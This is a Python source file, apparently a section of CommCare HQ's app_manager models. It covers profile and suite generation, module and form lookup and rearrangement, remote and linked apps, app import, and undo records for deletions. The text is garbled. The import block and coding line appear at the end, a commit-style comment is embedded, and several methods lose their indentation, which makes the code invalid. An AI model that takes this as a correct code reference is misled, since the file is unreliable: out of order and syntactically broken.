                       template='app_manager/profile.xml', build_profile_id=None, target_commcare_flavor=None):
        """Render profile.xml (or the ccpr/media variants) as UTF-8 bytes.

        Merges the app's stored profile settings with commcare setting
        defaults, forced properties (case sharing, logos, recovery measures),
        and custom properties, then renders the given template.
        """
        self__profile = self.profile
        app_profile = defaultdict(dict)

        for setting in commcare_settings.get_custom_commcare_settings():
            setting_type = setting['type']
            setting_id = setting['id']

            if setting_type not in ('properties', 'features'):
                setting_value = None
            elif setting_id not in self__profile.get(setting_type, {}):
                # not set on the app: only emit when HQ's default differs
                # from CommCare's built-in default
                if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
                    setting_value = setting['default']
                else:
                    setting_value = None
            else:
                setting_value = self__profile[setting_type][setting_id]
            if setting_value:
                app_profile[setting_type][setting_id] = {
                    'value': setting_value,
                    'force': setting.get('force', False)
                }
            # assert that it gets explicitly set once per loop
            del setting_value

        if self.case_sharing:
            # case sharing requires sync-tethered server mode
            app_profile['properties']['server-tether'] = {
                'force': True,
                'value': 'sync',
            }

        logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
        if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
            for logo_name in logo_refs:
                app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
                    'force': True,
                    'value': self.logo_refs[logo_name]['path'],
                }

        if toggles.MOBILE_RECOVERY_MEASURES.enabled(self.domain):
            app_profile['properties']['recovery-measures-url'] = {
                'force': True,
                'value': self.recovery_measures_url,
            }

        if with_media:
            profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
        else:
            profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')

        if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
            app_profile['custom_properties'].update(self__profile['custom_properties'])

        apk_heartbeat_url = self.heartbeat_url
        # first build language is used as the profile locale
        locale = self.get_build_langs(build_profile_id)[0]
        target_package_id = {
            TARGET_COMMCARE: 'org.commcare.dalvik',
            TARGET_COMMCARE_LTS: 'org.commcare.lts',
        }.get(target_commcare_flavor)
        return render_to_string(template, {
            'is_odk': is_odk,
            'app': self,
            'profile_url': profile_url,
            'app_profile': app_profile,
            'cc_user_domain': cc_user_domain(self.domain),
            'include_media_suite': with_media,
            'uniqueid': self.master_id,
            'name': self.name,
            'descriptor': "Profile File",
            'build_profile_id': build_profile_id,
            'locale': locale,
            'apk_heartbeat_url': apk_heartbeat_url,
            'target_package_id': target_package_id,
        }).encode('utf-8')
    @property
    def custom_suite(self):
        """Hand-authored suite snippet stored as an attachment, or '' if none."""
        try:
            return self.lazy_fetch_attachment('custom_suite.xml')
        except ResourceNotFound:
            return ""

    def set_custom_suite(self, value):
        # store (or replace) the custom suite attachment
        self.put_attachment(value, 'custom_suite.xml')

    def create_suite(self, build_profile_id=None):
        """Generate suite.xml; only valid for APP_V2 apps."""
        self.assert_app_v2()
        return SuiteGenerator(self, build_profile_id).generate_suite()

    def create_media_suite(self, build_profile_id=None):
        """Generate media_suite.xml for the app/build profile."""
        return MediaSuiteGenerator(self, build_profile_id).generate_suite()
    @memoized
    def get_practice_user_id(self, build_profile_id=None):
        # returns app or build profile specific practice_mobile_worker_id
        if build_profile_id:
            build_spec = self.build_profiles[build_profile_id]
            return build_spec.practice_mobile_worker_id
        else:
            return self.practice_mobile_worker_id

    @property
    @memoized
    def enable_practice_users(self):
        """Practice users need both CommCare support and the domain privilege."""
        return (
            self.supports_practice_users and
            domain_has_privilege(self.domain, privileges.PRACTICE_MOBILE_WORKERS)
        )

    @property
    @memoized
    def enable_update_prompts(self):
        return (
            # custom for ICDS until ICDS users are > 2.38
            (self.supports_update_prompts or toggles.ICDS.enabled(self.domain)) and
            toggles.PHONE_HEARTBEAT.enabled(self.domain)
        )

    @memoized
    def get_practice_user(self, build_profile_id=None):
        """
        kwargs:
            build_profile_id: id of a particular build profile to get the practice user for
                If it's None, practice user of the default app is returned

        Returns:
            App or build profile specific practice user and validates that the user is
                a practice mode user and that user belongs to app.domain

        This is memoized to avoid refetching user when validating app, creating build files and
            generating suite file.
        """
        practice_user_id = self.get_practice_user_id(build_profile_id=build_profile_id)
        if practice_user_id:
            return get_and_assert_practice_user_in_domain(practice_user_id, self.domain)
        else:
            return None
    @time_method()
    def create_practice_user_restore(self, build_profile_id=None):
        """
        Returns:
            Returns restore xml as a string for the practice user of app or
            app profile specfied by build_profile_id
            Raises a PracticeUserException if the user is not practice user
        """
        from corehq.apps.ota.models import DemoUserRestore
        if not self.enable_practice_users:
            return None
        user = self.get_practice_user(build_profile_id)
        if user:
            user_restore = DemoUserRestore.objects.get(id=user.demo_restore_id)
            return user_restore.get_restore_as_string()
        else:
            return None
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
return 'modules-%s/forms-%s.xml' % (module.id, form.id)
    @time_method()
    def _make_language_files(self, prefix, build_profile_id):
        """App-strings files for 'default' plus every build language,
        keyed by their path inside the build payload."""
        return {
            "{}{}/app_strings.txt".format(prefix, lang): self.create_app_strings(lang, build_profile_id).encode('utf-8')
            for lang in ['default'] + self.get_build_langs(build_profile_id)
        }

    @time_method()
    def _get_form_files(self, prefix, build_profile_id):
        """Rendered XForm files for every buildable form, keyed by payload path.

        Shadow forms and disabled release forms are excluded; validation
        failures are re-raised as user-facing XFormExceptions.
        """
        files = {}
        for form_stuff in self.get_forms(bare=False):
            def exclude_form(form):
                return isinstance(form, ShadowForm) or form.is_a_disabled_release_form()

            if not exclude_form(form_stuff['form']):
                filename = prefix + self.get_form_filename(**form_stuff)
                form = form_stuff['form']
                try:
                    files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
                except XFormValidationFailed:
                    raise XFormException(_('Unable to validate the forms due to a server error. '
                                           'Please try again later.'))
                except XFormException as e:
                    raise XFormException(_('Error in form "{}": {}').format(trans(form.name), six.text_type(e)))
        return files
    @time_method()
    @memoized
    def create_all_files(self, build_profile_id=None):
        """Build every file of the app payload (profiles, suites, app strings,
        forms, optional flavor profiles and practice-user restore) as a dict
        mapping payload path -> content."""
        # stamping versions must happen before any profile/suite is rendered
        self.set_form_versions()
        self.set_media_versions()
        prefix = '' if not build_profile_id else build_profile_id + '/'
        files = {
            '{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
            '{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
            '{}media_profile.xml'.format(prefix):
                self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
            '{}media_profile.ccpr'.format(prefix):
                self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
            '{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
            '{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
        }

        # extra profile variants for a specific CommCare flavor (e.g. LTS)
        if self.target_commcare_flavor != 'none':
            files['{}profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
                is_odk=False,
                build_profile_id=build_profile_id,
                target_commcare_flavor=self.target_commcare_flavor,
            )
            files['{}profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
                is_odk=True,
                build_profile_id=build_profile_id,
                target_commcare_flavor=self.target_commcare_flavor,
            )
            files['{}media_profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
                is_odk=False,
                with_media=True,
                build_profile_id=build_profile_id,
                target_commcare_flavor=self.target_commcare_flavor,
            )
            files['{}media_profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
                is_odk=True,
                with_media=True,
                build_profile_id=build_profile_id,
                target_commcare_flavor=self.target_commcare_flavor,
            )

        practice_user_restore = self.create_practice_user_restore(build_profile_id)
        if practice_user_restore:
            files.update({
                '{}practice_user_restore.xml'.format(prefix): practice_user_restore
            })

        files.update(self._make_language_files(prefix, build_profile_id))
        files.update(self._get_form_files(prefix, build_profile_id))
        return files
    # iterator over modules with their indices attached (IndexedSchema helper)
    get_modules = IndexedSchema.Getter('modules')

    @parse_int([1])
    def get_module(self, i):
        """Return module at index i (negative indices wrap via modulo)."""
        try:
            return self.modules[i].with_id(i % len(self.modules), self)
        except IndexError:
            raise ModuleNotFoundException()

    def get_module_by_unique_id(self, unique_id, error=''):
        """Return the module with the given unique_id, or raise
        ModuleNotFoundException with `error` (or a default message)."""
        def matches(module):
            return module.get_or_create_unique_id() == unique_id
        for obj in self.get_modules():
            if matches(obj):
                return obj
        if not error:
            error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
                app_name=self.name, unique_id=unique_id)
        raise ModuleNotFoundException(error)

    def get_module_index(self, unique_id):
        """Return the positional index of the module with unique_id."""
        for index, module in enumerate(self.get_modules()):
            if module.unique_id == unique_id:
                return index
        error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
            app_name=self.name, unique_id=unique_id)
        raise ModuleNotFoundException(error)

    def get_report_modules(self):
        # yields only ReportModule instances
        for module in self.modules:
            if isinstance(module, ReportModule):
                yield module
    def get_forms(self, bare=True):
        """Yield every form in the app; with bare=False, yield dicts of
        {'type', 'module', 'form'} instead of bare form objects."""
        for module in self.get_modules():
            for form in module.get_forms():
                yield form if bare else {
                    'type': 'module_form',
                    'module': module,
                    'form': form
                }

    def get_form(self, form_unique_id, bare=True):
        """Return the form (or bare=False dict) with the given unique id,
        raising FormNotFoundException when absent."""
        def matches(form):
            return form.get_unique_id() == form_unique_id
        for obj in self.get_forms(bare):
            if matches(obj if bare else obj['form']):
                return obj
        raise FormNotFoundException(
            ("Form in app '%s' with unique id '%s' not found"
             % (self.id, form_unique_id)))

    def get_form_location(self, form_unique_id):
        """Return (module_index, form_index) for the form, or raise KeyError."""
        for m_index, module in enumerate(self.get_modules()):
            for f_index, form in enumerate(module.get_forms()):
                if form_unique_id == form.unique_id:
                    return m_index, f_index
        raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, form_unique_id))
    @classmethod
    def new_app(cls, domain, name, lang="en"):
        """Construct an unsaved empty app for `domain`."""
        app = cls(domain=domain, modules=[], name=name, langs=[lang], date_created=datetime.datetime.utcnow())
        return app

    def add_module(self, module):
        """Append a module and return it wrapped with its index."""
        self.modules.append(module)
        return self.get_module(-1)

    def delete_module(self, module_unique_id):
        """Remove a module, recording a DeleteModuleRecord so the deletion
        can be undone. Returns the record, or None if the module is missing."""
        try:
            module = self.get_module_by_unique_id(module_unique_id)
        except ModuleNotFoundException:
            return None
        record = DeleteModuleRecord(
            domain=self.domain,
            app_id=self.id,
            module_id=module.id,
            module=module,
            datetime=datetime.datetime.utcnow()
        )
        del self.modules[module.id]
        record.save()
        return record

    def new_form(self, module_id, name, lang, attachment=Ellipsis):
        # Ellipsis is the "not provided" sentinel for attachment
        module = self.get_module(module_id)
        return module.new_form(name, lang, attachment)
    def delete_form(self, module_unique_id, form_unique_id):
        """Remove a form from its module, recording a DeleteFormRecord for
        undo. Returns the record, or None when module/form is missing."""
        try:
            module = self.get_module_by_unique_id(module_unique_id)
            form = self.get_form(form_unique_id)
        except (ModuleNotFoundException, FormNotFoundException):
            return None

        # record is saved before mutation so the form snapshot is intact
        record = DeleteFormRecord(
            domain=self.domain,
            app_id=self.id,
            module_unique_id=module_unique_id,
            form_id=form.id,
            form=form,
            datetime=datetime.datetime.utcnow(),
        )
        record.save()

        try:
            form.pre_delete_hook()
        except NotImplementedError:
            # hooks are optional on form types
            pass

        del module['forms'][form.id]
        return record
    def rename_lang(self, old_lang, new_lang):
        """Rename a language code throughout the app: app langs, build
        profiles, every module, and the translations dict.

        Raises AppEditingError if new_lang already exists.
        """
        validate_lang(new_lang)
        if old_lang == new_lang:
            return
        if new_lang in self.langs:
            raise AppEditingError("Language %s already exists!" % new_lang)
        for i, lang in enumerate(self.langs):
            if lang == old_lang:
                self.langs[i] = new_lang
        for profile in self.build_profiles:
            for i, lang in enumerate(profile.langs):
                if lang == old_lang:
                    profile.langs[i] = new_lang
        for module in self.get_modules():
            module.rename_lang(old_lang, new_lang)
        _rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
modules = self.modules
try:
modules.insert(i, modules.pop(j))
except IndexError:
raise RearrangeError()
self.modules = modules
    def rearrange_forms(self, to_module_id, from_module_id, i, j):
        """
        Move form j of from_module to position i of to_module.

        If the case types of the two modules conflict, the rearrangement
        goes through anyway. This is intentional.
        """
        to_module = self.get_module(to_module_id)
        from_module = self.get_module(from_module_id)
        try:
            from_module.forms[j].pre_move_hook(from_module, to_module)
        except NotImplementedError:
            # move hooks are optional on form types
            pass
        try:
            form = from_module.forms.pop(j)
            if not isinstance(form, AdvancedForm):
                # when moving between a survey module and a case module,
                # flip the form's case requirements to match the destination
                if from_module.is_surveys != to_module.is_surveys:
                    if from_module.is_surveys:
                        form.requires = "case"
                        form.actions.update_case = UpdateCaseAction(
                            condition=FormActionCondition(type='always'))
                    else:
                        form.requires = "none"
                        form.actions.update_case = UpdateCaseAction(
                            condition=FormActionCondition(type='never'))
            to_module.add_insert_form(from_module, form, index=i, with_source=True)
        except IndexError:
            raise RearrangeError()
    def scrub_source(self, source):
        """Regenerate form unique ids and report module ids in an exported
        app source so the copy cannot collide with the original."""
        source = update_form_unique_ids(source)
        return update_report_module_ids(source)

    def copy_form(self, from_module, form, to_module, rename=False):
        """
        Copy a form into to_module and return the new form.

        If the case types of the two modules conflict,
        copying (confusingly) is still allowed.
        This is intentional.
        """
        copy_source = deepcopy(form.to_json())
        # only one form can be a release notes form, so set them to False explicitly when copying
        copy_source['is_release_notes_form'] = False
        copy_source['enable_release_notes'] = False
        # drop the id so the copy gets a fresh one on wrap
        if 'unique_id' in copy_source:
            del copy_source['unique_id']

        if rename:
            for lang, name in six.iteritems(copy_source['name']):
                # translate "Copy of ..." in each of the form's languages
                with override(lang):
                    copy_source['name'][lang] = _('Copy of {name}').format(name=name)

        copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
        to_app = to_module.get_app()
        save_xform(to_app, copy_form, form.source.encode('utf-8'))

        return copy_form
    @cached_property
    def has_case_management(self):
        """True when any form in the app has at least one active case action."""
        for module in self.get_modules():
            for form in module.get_forms():
                if len(form.active_actions()) > 0:
                    return True
        return False

    @memoized
    def case_type_exists(self, case_type):
        return case_type in self.get_case_types()

    @memoized
    def get_case_types(self):
        """Set of all case types used by any module, plus the usercase type
        when the domain has usercases enabled."""
        extra_types = set()
        if is_usercase_in_use(self.domain):
            extra_types.add(USERCASE_TYPE)
        return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types
def has_media(self):
return len(self.multimedia_map) > 0
    @memoized
    def get_xmlns_map(self):
        """Map of xmlns -> list of forms declaring that xmlns."""
        xmlns_map = defaultdict(list)
        for form in self.get_forms():
            xmlns_map[form.xmlns].append(form)
        return xmlns_map

    def get_forms_by_xmlns(self, xmlns, log_missing=True):
        """
        Return the forms with the given xmlns.
        This function could return multiple forms if there are shadow forms in the app.
        """
        # device reports are not app forms; never match them
        if xmlns == "http://code.javarosa.org/devicereport":
            return []
        forms = self.get_xmlns_map()[xmlns]
        if len(forms) < 1:
            if log_missing:
                logging.error('App %s in domain %s has %s forms with xmlns %s' % (
                    self.get_id,
                    self.domain,
                    len(forms),
                    xmlns,
                ))
            return []
        # at most one real form may own an xmlns; the rest are shadow forms
        non_shadow_forms = [form for form in forms if form.form_type != 'shadow_form']
        assert len(non_shadow_forms) <= 1
        return forms
    def get_xform_by_xmlns(self, xmlns, log_missing=True):
        """Return the wrapped XForm for this xmlns, or None if no form has it."""
        forms = self.get_forms_by_xmlns(xmlns, log_missing)
        if not forms:
            return None
        else:
            # If there are multiple forms with the same xmlns, then all but one are shadow forms, therefore they
            # all have the same xform.
            return forms[0].wrapped_xform()

    def get_questions(self, xmlns, langs=None, include_triggers=False, include_groups=False,
                      include_translations=False):
        """Return the question list for the form with this xmlns ([] if none)."""
        forms = self.get_forms_by_xmlns(xmlns)
        if not forms:
            return []
        # If there are multiple forms with the same xmlns, then some of them are shadow forms, so all the questions
        # will be the same.
        return forms[0].get_questions(langs or self.langs, include_triggers, include_groups, include_translations)
    def validate_app(self):
        """Run full app validation; returns the validator's error list."""
        return ApplicationValidator(self).validate_app()

    def get_profile_setting(self, s_type, s_id):
        """Resolve an effective profile setting value, in priority order:
        explicit app profile value, contingent default whose condition holds,
        disabled default (when the build predates the setting), then the
        setting's plain default."""
        setting = self.profile.get(s_type, {}).get(s_id)
        if setting is not None:
            return setting
        yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
        for contingent in yaml_setting.get("contingent_default", []):
            if check_condition(self, contingent["condition"]):
                setting = contingent["value"]
        if setting is not None:
            return setting
        # builds older than the setting's "since" version get disabled_default
        if not self.build_version or self.build_version < LooseVersion(yaml_setting.get("since", "0")):
            setting = yaml_setting.get("disabled_default", None)
            if setting is not None:
                return setting
        return yaml_setting.get("default")
    @quickcache(['self._id', 'self.version'])
    def get_case_metadata(self):
        """Assemble AppCaseMetadata for the app: case-type relationships,
        per-module and per-form case property usage, and data-dictionary
        descriptions for each property."""
        from corehq.apps.reports.formdetails.readable import AppCaseMetadata
        case_relationships = get_parent_type_map(self)
        meta = AppCaseMetadata()
        descriptions_dict = get_case_property_description_dict(self.domain)

        for case_type, relationships in case_relationships.items():
            type_meta = meta.get_type(case_type)
            type_meta.relationships = relationships

        for module in self.get_modules():
            module.update_app_case_meta(meta)
            for form in module.get_forms():
                form.update_app_case_meta(meta)

        # attach data-dictionary descriptions last, once all props are known
        for type_ in meta.case_types:
            for prop in type_.properties:
                prop.description = descriptions_dict.get(type_.name, {}).get(prop.name, '')

        return meta
    def get_subcase_types(self, case_type):
        """
        Return the subcase types defined across an app for the given case type
        """
        return {t for m in self.get_modules()
                if m.case_type == case_type
                for t in m.get_subcase_types()}

    @memoized
    def grid_display_for_some_modules(self):
        # 'some' = only flagged modules use grid form menus
        return self.grid_form_menus == 'some'

    @memoized
    def grid_display_for_all_modules(self):
        # 'all' = every module uses grid form menus
        return self.grid_form_menus == 'all'
class RemoteApp(ApplicationBase):
    """
    A wrapper for a url pointing to a suite or profile file. This allows you to
    write all the files for an app by hand, and then give the url to app_manager
    and let it package everything together for you.
    """
    profile_url = StringProperty(default="http://")
    name = StringProperty()
    manage_urls = BooleanProperty(default=False)

    # cache of xmlns -> question list, populated lazily by get_questions
    questions_map = DictProperty(required=False)

    def is_remote_app(self):
        return True

    @classmethod
    def new_app(cls, domain, name, lang='en'):
        """Construct an unsaved remote app."""
        app = cls(domain=domain, name=name, langs=[lang])
        return app

    def create_profile(self, is_odk=False, langs=None):
        # we don't do odk for now anyway
        return remote_app.make_remote_profile(self, langs)

    def strip_location(self, location):
        """Normalize a resource location relative to the profile url."""
        return remote_app.strip_location(self.profile_url, location)

    def fetch_file(self, location):
        """Download one resource; returns (normalized location, content).

        Raises AppEditingError on any fetch failure.
        """
        location = self.strip_location(location)
        url = urljoin(self.profile_url, location)

        try:
            content = urlopen(url).read()
        except Exception:
            raise AppEditingError('Unable to access resource url: "%s"' % url)

        return location, content

    def get_build_langs(self):
        """Languages to build with: the single build profile's langs if one
        exists, else the app langs. More than one profile is an error."""
        if self.build_profiles:
            if len(list(self.build_profiles.keys())) > 1:
                raise AppEditingError('More than one app profile for a remote app')
            else:
                # return first profile, generated as part of lazy migration
                return self.build_profiles[list(self.build_profiles.keys())[0]].langs
        else:
            return self.langs

    @classmethod
    def get_locations(cls, suite):
        """Yield (resource tag, location) pairs from a parsed suite,
        preferring local-authority locations over remote ones."""
        for resource in suite.findall('*/resource'):
            try:
                loc = resource.findtext('location[@authority="local"]')
            except Exception:
                loc = resource.findtext('location[@authority="remote"]')
            yield resource.getparent().tag, loc

    @property
    def SUITE_XPATH(self):
        # xpath of the suite resource's local location within the profile
        return 'suite/resource/location[@authority="local"]'

    def create_all_files(self, build_profile_id=None):
        """Fetch the remote profile, suite(s) and all referenced resources,
        returning a dict of payload path -> content."""
        langs_for_build = self.get_build_langs()
        files = {
            'profile.xml': self.create_profile(langs=langs_for_build),
        }
        tree = _parse_xml(files['profile.xml'])

        def add_file_from_path(path, strict=False, transform=None):
            # fetch every resource the profile references at `path`;
            # returns the list of fetched (possibly transformed) contents
            added_files = []
            # must find at least one
            try:
                tree.find(path).text
            except (TypeError, AttributeError):
                if strict:
                    raise AppEditingError("problem with file path reference!")
                else:
                    return
            for loc_node in tree.findall(path):
                loc, file = self.fetch_file(loc_node.text)
                if transform:
                    file = transform(file)
                files[loc] = file
                added_files.append(file)
            return added_files

        add_file_from_path('features/users/logo')
        try:
            suites = add_file_from_path(
                self.SUITE_XPATH,
                strict=True,
                transform=(lambda suite:
                           remote_app.make_remote_suite(self, suite))
            )
        except AppEditingError:
            raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))

        for suite in suites:
            suite_xml = _parse_xml(suite)

            for tag, location in self.get_locations(suite_xml):
                location, data = self.fetch_file(location)
                if tag == 'xform' and langs_for_build:
                    # strip languages that are not part of this build
                    try:
                        xform = XForm(data)
                    except XFormException as e:
                        raise XFormException('In file %s: %s' % (location, e))
                    xform.exclude_languages(whitelist=langs_for_build)
                    data = xform.render()
                files.update({location: data})
        return files

    def make_questions_map(self):
        """Rebuild the xmlns -> questions map from this build's attachments.

        Only works on a saved build (copy_of set); returns None otherwise.
        """
        langs_for_build = self.get_build_langs()
        if self.copy_of:
            xmlns_map = {}

            def fetch(location):
                filepath = self.strip_location(location)
                return self.fetch_attachment('files/%s' % filepath, return_bytes=True)

            profile_xml = _parse_xml(fetch('profile.xml'))
            suite_location = profile_xml.find(self.SUITE_XPATH).text
            suite_xml = _parse_xml(fetch(suite_location))

            for tag, location in self.get_locations(suite_xml):
                if tag == 'xform':
                    xform = XForm(fetch(location).decode('utf-8'))
                    xmlns = xform.data_node.tag_xmlns
                    questions = xform.get_questions(langs_for_build)
                    xmlns_map[xmlns] = questions
            return xmlns_map
        else:
            return None

    def get_questions(self, xmlns):
        """Questions for the form with this xmlns, building and persisting
        the questions_map cache on first use."""
        if not self.questions_map:
            self.questions_map = self.make_questions_map()
            if not self.questions_map:
                return []
            # persist the freshly-built cache
            self.save()
        questions = self.questions_map.get(xmlns, [])
        return questions
class LinkedApplication(Application):
    """
    An app that can pull changes from an app in a different domain.
    """
    # This is the id of the master application
    master = StringProperty()

    # The following properties will overwrite their corresponding values from
    # the master app everytime the new master is pulled
    linked_app_translations = DictProperty()  # corresponding property: translations
    linked_app_logo_refs = DictProperty()  # corresponding property: logo_refs

    # if `uses_master_app_form_ids` is True, the form id might match the master's form id
    # from a bug years ago. These should be fixed when mobile can handle the change
    # https://manage.dimagi.com/default.asp?283410
    uses_master_app_form_ids = BooleanProperty(default=False)

    @property
    @memoized
    def domain_link(self):
        # the DomainLink connecting this domain to the master's domain
        from corehq.apps.linked_domain.dbaccessors import get_domain_master_link
        return get_domain_master_link(self.domain)

    def get_master_version(self):
        # None when no domain link exists
        if self.domain_link:
            return get_master_app_version(self.domain_link, self.master)

    @property
    def master_is_remote(self):
        # None when no domain link exists
        if self.domain_link:
            return self.domain_link.is_remote

    def get_latest_master_release(self):
        """Latest released build of the master app; raises ActionNotPermitted
        when this domain is not linked."""
        if self.domain_link:
            return get_latest_master_app_release(self.domain_link, self.master)
        else:
            raise ActionNotPermitted

    def reapply_overrides(self):
        """Re-apply local overrides (translations, logos) after pulling a new
        master version, then save."""
        self.translations.update(self.linked_app_translations)
        self.logo_refs.update(self.linked_app_logo_refs)
        for key, ref in self.logo_refs.items():
            mm = CommCareMultimedia.get(ref['m_id'])
            self.create_mapping(mm, ref['path'], save=False)
        self.save()
def import_app(app_id_or_source, domain, source_properties=None):
    """Create a new (unsaved) app in `domain` from an existing app.

    :param app_id_or_source: either the id of an app to fetch, or an
        already-exported app source document (dict-like).
    :param domain: destination domain name.
    :param source_properties: optional overrides applied to the source doc
        before wrapping (e.g. a new name).
    :returns: the new app instance (attachments saved; doc itself not saved).
    :raises AppEditingError: when a report module references a report with no
        mapping in the destination domain.
    """
    if isinstance(app_id_or_source, six.string_types):
        soft_assert_type_text(app_id_or_source)
        app_id = app_id_or_source
        source = get_app(None, app_id)
        source_domain = source['domain']
        source = source.export_json(dump_json=False)
        report_map = get_static_report_mapping(source_domain, domain)
    else:
        cls = get_correct_app_class(app_id_or_source)
        # Don't modify original app source
        app = cls.wrap(deepcopy(app_id_or_source))
        source = app.export_json(dump_json=False)
        report_map = {}
    try:
        attachments = source['_attachments']
    except KeyError:
        attachments = {}
    finally:
        # attachments are re-saved separately below
        source['_attachments'] = {}
    if source_properties is not None:
        for key, value in six.iteritems(source_properties):
            source[key] = value
    cls = get_correct_app_class(source)
    # Allow the wrapper to update to the current default build_spec
    if 'build_spec' in source:
        del source['build_spec']
    app = cls.from_source(source, domain)
    app.date_created = datetime.datetime.utcnow()
    app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)

    if report_map:
        # remap report module configs onto the destination domain's reports
        for module in app.get_report_modules():
            for config in module.report_configs:
                try:
                    config.report_id = report_map[config.report_id]
                except KeyError:
                    raise AppEditingError(
                        "Report {} not found in {}".format(config.report_id, domain)
                    )

    app.save_attachments(attachments)

    if not app.is_remote_app():
        # share each media document with the destination domain
        # (loop var renamed from `_`, which shadowed the ugettext alias)
        for _path, media in app.get_media_objects():
            if domain not in media.valid_domains:
                media.valid_domains.append(domain)
                media.save()
        enable_usercase_if_necessary(app)

    return app
def enable_usercase_if_necessary(app):
    """Enable usercases on the app's domain if any module uses them."""
    if any(module.uses_usercase() for module in app.get_modules()):
        from corehq.apps.app_manager.util import enable_usercase
        enable_usercase(app.domain)
class DeleteApplicationRecord(DeleteRecord):
    """Undo record for a deleted application."""
    app_id = StringProperty()

    def undo(self):
        # restore the original doc_type, which deletion had suffixed
        app = ApplicationBase.get(self.app_id)
        app.doc_type = app.get_doc_type()
        app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
    """Undo record for a deleted module: stores the module and its index."""
    app_id = StringProperty()
    module_id = IntegerProperty()
    module = SchemaProperty(ModuleBase)

    def undo(self):
        app = Application.get(self.app_id)
        modules = app.modules
        # reinsert at the original position
        modules.insert(self.module_id, self.module)
        app.modules = modules
        app.save()
class DeleteFormRecord(DeleteRecord):
    """Undo record for a deleted form: stores the form, its index, and the
    owning module (by unique id for newer records, by index for older ones)."""
    app_id = StringProperty()
    module_id = IntegerProperty()
    module_unique_id = StringProperty()
    form_id = IntegerProperty()
    form = SchemaProperty(FormBase)

    def undo(self):
        app = Application.get(self.app_id)
        if self.module_unique_id is not None:
            name = trans(self.form.name, app.default_language, include_lang=False)
            module = app.get_module_by_unique_id(
                self.module_unique_id,
                error=_("Could not find form '{}'").format(name)
            )
        else:
            # legacy records identify the module only by index
            module = app.modules[self.module_id]
        forms = module.forms
        forms.insert(self.form_id, self.form)
        module.forms = forms
        app.save()
class GlobalAppConfig(Document):
    """Per-app mobile update-prompt configuration (shared across builds)."""

    # this should be the unique id of the app (not of a versioned copy)
    app_id = StringProperty()
    domain = StringProperty()

    # these let mobile prompt updates for application and APK
    app_prompt = StringProperty(
        choices=["off", "on", "forced"],
        default="off"
    )
    apk_prompt = StringProperty(
        choices=["off", "on", "forced"],
        default="off"
    )
    # corresponding versions to which user should be prompted to update to
    apk_version = StringProperty(default=LATEST_APK_VALUE)  # e.g. '2.38.0/latest'
    app_version = IntegerProperty(default=LATEST_APP_VALUE)

    @classmethod
    def for_app(cls, app):
        """
        Returns the actual config object for the app or an unsaved
        default object
        """
        app_id = app.master_id

        res = cls.get_db().view(
            "global_app_config_by_app_id/view",
            key=[app_id, app.domain],
            reduce=False,
            include_docs=True,
        ).one()

        if res:
            return cls(res['doc'])
        else:
            # return default config
            return cls(app_id=app_id, domain=app.domain)

    def save(self, *args, **kwargs):
        # keep the LatestAppInfo cache in sync with any config change
        LatestAppInfo(self.app_id, self.domain).clear_caches()
        super(GlobalAppConfig, self).save(*args, **kwargs)
class LatestEnabledBuildProfiles(models.Model):
    """SQL record marking a build profile's latest enabled build/version."""
    app_id = models.CharField(max_length=255)
    build_profile_id = models.CharField(max_length=255)
    version = models.IntegerField()
    build_id = models.CharField(max_length=255)

    def expire_cache(self, domain):
        """Invalidate the cached lookups that depend on this record."""
        get_latest_enabled_build_for_profile.clear(domain, self.build_profile_id)
        get_latest_enabled_versions_per_profile.clear(self.app_id)
# backwards compatibility with suite-1.0.xml
# NOTE: these monkey-patch locale/command id helpers onto the form and
# module classes, delegating to the id_strings module.
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)

ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)

ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)

Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
# Added error message to ModuleNotFoundException
# coding=utf-8
from __future__ import absolute_import
from __future__ import unicode_literals
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple, Counter
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from io import BytesIO
import qrcode
from django.utils.safestring import SafeBytes
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from django.utils.translation import ugettext_lazy
